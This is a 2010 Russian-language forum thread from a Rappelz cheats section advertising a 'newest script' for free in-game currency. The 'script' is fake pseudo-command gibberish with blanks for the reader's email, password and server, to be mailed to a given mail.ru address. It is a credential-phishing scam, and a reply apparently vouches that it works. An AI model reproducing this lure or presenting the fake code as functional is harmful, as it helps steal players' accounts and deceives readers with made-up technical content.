ChemaX RF Online

Объявление

Все кто хочет получить посты за свои темы напишите мне письмо с ссылкой темы. ВНИМАНИЕ: Заголовок(тема) сообщения должно содержать: "ХОЧУ ПОСТЫ!!!". Если этого не будит вы не получите посты так как докажите свою невнимательность на форуме.

chemax.topbb.ru

Здравствуйте уважаемый пользователь, просим вас использовать код нашего баннера для размещения на своих сайтах/форумах и в замен на вашу помощь мы сделаем/установим ваш баннер на нашем форуме.
Код баннера нашего портала можно узнать в соответствующей теме

С Уважением XZey

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » ChemaX RF Online » Читы/Баги/Проги/Сервера для Rappelz » Новейший скрип на Ruppes!!!


Новейший скрип на Ruppes!!!

Сообщений 1 страница 3 из 3

1

в теме писать не надо!

///bot ruppes
rappelz/bot login: (здесь мы вводим свой е-майл)
///g/d/rappelz/bot password: (здесь свой пароль)
///admin/pass/login/ serv: (здесь сервер на котором мы играем. Например: сирена или пантера)
...insert /back/d/rappelz/ ruppes: (здесь вводим сколько руппи вам необходимо. Например 9999999)
[/forward2folder 00123691]
mile page: 500256
\admin:GameXP <subscribe@gamexp.ru>
launcher: v1.547
Client:v1.4.547 Cala Lab Corp
password correct now to 8/d//rappelz insert

Отправить на адрес:  rzonlinebotruppes@mail.ru

Если что-то не получается пишите мне в асю:594-652-886

И еше не советую делать новые аки для проверки скрипа,моментом ставят бан,потому что новый акаунт и сразу с баблом,сами подумайте бредд!

Отредактировано llegolas (2010-12-28 18:08:07)

2

Супееееееееееррррррррр!!!!!!!! Скрип работает :cool:  только он на старых пашет :'(  а не на новых акаунтов ... ну пох соровно есть хищь 105+10 вот теперь жесть а не игра!!!!!!)))))

Отредактировано ахмед2010 (2010-12-28 21:28:52)

3

ку


Вы здесь » ChemaX RF Online » Читы/Баги/Проги/Сервера для Rappelz » Новейший скрип на Ruppes!!!